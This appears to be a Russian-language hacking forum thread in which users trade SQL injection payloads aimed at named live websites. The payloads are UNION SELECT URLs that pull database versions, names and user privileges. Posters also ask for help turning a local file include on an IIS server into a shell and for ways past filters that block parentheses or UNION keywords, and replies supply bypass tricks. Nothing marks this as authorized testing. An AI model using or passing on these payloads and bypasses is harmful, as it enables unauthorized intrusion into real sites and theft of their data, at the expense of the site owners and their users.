http://www.onradio.gr/play_old.php?id=1+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33+--+ кроме ошибки ни чего не выводит версию не прозывает, смог только имя базы узнать onrad2_radio http://www.onradio.gr/play_old.php?id=1+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33+FROM+users--+ Если при запросе union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33 ни выводит ни одну из цифр значит ни чего не сделать?
зафолсите запрос, там есть вывод http://www.onradio.gr/play_old.php?id=1+and(version()=user())+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33--+
Ребята инклуд локал на вин серве, залить ничего не могу, стоит иис, что б такое проинклюдить чтобы заполучить шелл?
2shell_code Знаю на зубок эту тему, вот только написал, что стоит IIS (а не апач), и да ошибку мускула сделать не могу, чтобы проинклюдить логи мускула. фтп не стоит. з.ы. за отклик спасибо шелл
server-status и server-info Открыты файлы sever-status и server-info. Что злоумышленник может сделать, используя эту информацию? Н-р: http://ts-tvoimir.ru/server-status Кроме как использовать эту информацию при ддосе, больше же ничего он не почерпнет из этих файлов?
http://www.sait.com/news.php?id=12+uNiOn+all+seLeCT+1,2,3,concat(grantee,0x3a,is_grantable),5,6,7,8+from+information_schema.user_privileges Выдает 'user'@'%':NO:USAGE 1 строка http://www.sait.com/news.php?id=12+uNiOn+all+seLeCT+1,2,3,PRIVILEGE_TYPE,5,6,7,8+from+information_schema.user_privileges+where+IS_GRANTABLE=0x594553 пусто делаю тоже самое но на localhost работает, может кто сталкивался с эти, хотел бы узнать права юзера но как это сделать?
Пишу запрос +union+select+1,2,3,4,5,6,7,8+-- Нужной цифрой является 2. И когда я посылаю что то по типу: +union+select+1,user(),3,4,5,6,7,8+-- или +union+select+1,database(),3,4,5,6,7,8+-- предо мной загружается чистейший, белый лист. В чем тут проблема? Как это исправить? С какой стороны подойти?
Expl0ited, да, спасибо. @@version сработало. Вот @@user() @@database... Не то. Можешь меня ткнуть носом где об этом почитать? То как так использовать подобное. Уж очень хочется ее раскрутить.
@@user и @@database не заработали, потому что нету таких системных переменных, походу у тебя фильтрация скобок пробуй пост запросы
Ну стало ясно что фильтруются скобки, можешь спокойно крутить без их использования, просто отказавшись от функций, используя стандартный набор union select column from table where column=data limit 1
Спасибо, но я уже в гугле побывал несколько раз. Как сплоиты под винду юзать вообще не представляю. С виндою не очень дружу...
Помогите плз. Если $_POST не фильтруеться. НА сервере вот какая проверка идет: Что можно подставить, чтобы обойти этот IF ?? Спасибо
Как можно обойти такой фильтр? http://www.onlymelbourne.com.au/melbourne.php?id=-371/*!UNioN*/SELeCT+1 просто переходит на: http://www.onlymelbourne.com.au/melbourne.php Заранее благодарю за любой ответ.
